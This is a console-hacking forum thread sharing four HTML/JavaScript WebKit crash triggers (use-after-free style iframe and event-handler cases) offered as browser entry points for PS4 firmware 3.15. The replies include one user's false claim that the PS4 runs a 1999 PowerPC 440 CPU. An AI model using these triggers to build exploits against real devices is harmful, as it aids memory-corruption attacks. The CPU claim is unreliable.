PS4 3.15 Firmware Entry Point for Testing from Zecoxao

Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.

• http://2.83.228.148/totally_not_gachimuchi/

@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers
1. Entry point:

<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>

2. Entry point:

<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>

Also the the source code from the Webkit from Sony

• EDIT / Update by B7U3 C50SS & source files from zecoxao & and a file server for accessing the PS4 Tests page - via, pasha4ur:
• You may also crash test your PS4 browser ATM on any FW from zecoxao's Github Page.

3. Entry Point:

<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>

4. Entry Point:

<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

 

[toni1988]

Read thro the src I sent you I believe that's what they are using it does allow alot of things I've bin going thro it all

yes, he claims to have 2 entry points 3.15 and full access to the system at 3.50

 

[B7U3 C50SS]

@toni1988 where did you find the info at on twitter? who's twitter was it? also who claims to have access to the system on 3.50?

 

[toni1988]

@toni1988 where did you find the info at on twitter? who's twitter was it? also who claims to have access to the system on 3.50?

how to send private messages sent on this site? you have Skype? @B7U3 C50SS

 

[PSXHAX]

@toni1988 In Xenforo PM's are called 'Conversations' so you'd click on a user's name in the forum and then click on the 'Start a Conversation' link in the window that appears... or just enter the user's name HERE to start one with them.

Your 'Conversations' are located / stored here also while logged in: https://www.psxhax.com/conversations/

 

[Chaos Kid]

Introduced in 1999, the PowerPC 440 was the first PowerPC core from IBM to include the Book E extension to the PowerPC specification. It also included theCoreConnect bus technology designed to be the interface between the parts inside a PowerPC based system-on-a-chip (SoC) device.

It is a high-performance core with separate 32 KB instruction and data L1caches, a seven-stage out-of-order dual-issue pipeline, supporting speeds of up to 800 MHz and L2 caches up to 256 KB. The core lacks a floating point unit(FPU) but it has an associated four-stage FPU that can be included using the APU (Auxiliary Processing Unit) interface. The 440 core adheres to the Power ISA v.2.03 using the Book III-E specification.

Xilinx currently incorporates one or two cores (depending on the member of the family) into the Virtex-5 FXT FPGA.

Both AMCC and IBM are developing and marketing stand alone processors using 440 cores. IBM and Synopsys also offers fully synthesized cores.


http://www.xilinx.com/products/intellectual-property/ppc440_virtex5.html#overview


http://pccomponents.com/datasheets/IBM-PPC440.PDF

 

[SorenAlke]

they can have fun now lmao... crash and burn .... pretty sad for these fools. lol...

 

[pasha4ur]

Supported Systems:
==================


http://www.xilinx.com/products/intellectual-property/ppc440_virtex5.html#overview


http://pccomponents.com/datasheets/IBM-PPC440.PDF

Some CPU. What is this for and why in thread about PS4?

 

[Chaos Kid]

Some CPU. What is this for and why in thread about PS4?

what makes sence to you? y would some1 post a processor in a ps4 thread? perhaps the ps4 is not running what you were told cuz people are so use2 being bottle fed they dont look for themselves and just cause the processor says jaguar on it hell i can print jaguar on any cpu but dont mean it is as stated now does it?

 

[nightfire10]

what is being shared is always good.thnx chaos for posting

 

[Chaos Kid]

and i will also state for any1 who asks this is the ps4 processor and as you can see its not an amd jaguar its a powerpc 440 made in 1999 its on wikipedia if you search for it